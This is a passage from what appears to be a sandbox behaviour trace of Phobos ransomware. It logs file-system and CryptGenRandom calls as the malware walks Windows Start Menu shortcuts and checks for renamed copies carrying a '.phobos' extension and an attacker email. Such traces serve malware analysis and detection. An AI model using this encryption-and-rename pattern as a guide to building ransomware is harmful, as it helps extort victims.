(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.692] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.692] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.692] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.692] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1899) returned 1 [0122.692] CloseHandle (hObject=0x334) returned 1 [0122.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk")) returned 0x20 [0122.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.693] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.693] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.693] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.731] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1322) returned 1 [0122.731] CloseHandle (hObject=0x330) returned 1 [0122.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk")) returned 0x20 [0122.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.732] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.732] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1242) returned 1 [0122.732] CloseHandle (hObject=0x330) returned 1 [0122.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk")) returned 0x20 [0122.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.733] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.733] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.733] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.733] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1294) returned 1 [0122.733] CloseHandle (hObject=0x330) returned 1 [0122.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk")) returned 0x20 [0122.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.734] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.734] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1270) returned 1 [0122.734] CloseHandle (hObject=0x330) returned 1 [0122.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk")) returned 0x20 [0122.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.735] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.735] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1298) returned 1 [0122.735] CloseHandle (hObject=0x330) returned 1 [0122.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk")) returned 0x20 [0122.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.736] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.736] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.768] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1274) returned 1 [0122.768] CloseHandle (hObject=0x340) returned 1 [0122.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk")) returned 0x20 [0122.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.768] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.768] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.768] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.769] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1232) returned 1 [0122.769] CloseHandle (hObject=0x340) returned 1 [0122.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk")) returned 0x20 [0122.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.769] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.770] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.770] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1262) returned 1 [0122.770] CloseHandle (hObject=0x340) returned 1 [0122.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk")) returned 0x20 [0122.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.770] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.771] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1248) returned 1 [0122.771] CloseHandle (hObject=0x340) returned 1 [0122.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk")) returned 0x20 [0122.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.771] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.771] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.771] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.772] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1288) returned 1 [0122.772] CloseHandle (hObject=0x340) returned 1 [0122.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk")) returned 0x20 [0122.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.772] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.772] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.772] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.773] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1246) returned 1 [0122.773] CloseHandle (hObject=0x340) returned 1 [0122.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk")) returned 0x20 [0122.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.773] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.774] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.774] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1262) returned 1 [0122.774] CloseHandle (hObject=0x340) returned 1 [0122.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk")) returned 0x20 [0122.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.774] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.775] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1274) returned 1 [0122.775] CloseHandle (hObject=0x340) returned 1 [0122.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk")) returned 0x20 [0122.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.775] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.775] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.775] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.776] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2741) returned 1 [0122.776] CloseHandle (hObject=0x340) returned 1 [0122.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk")) returned 0x20 [0122.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start 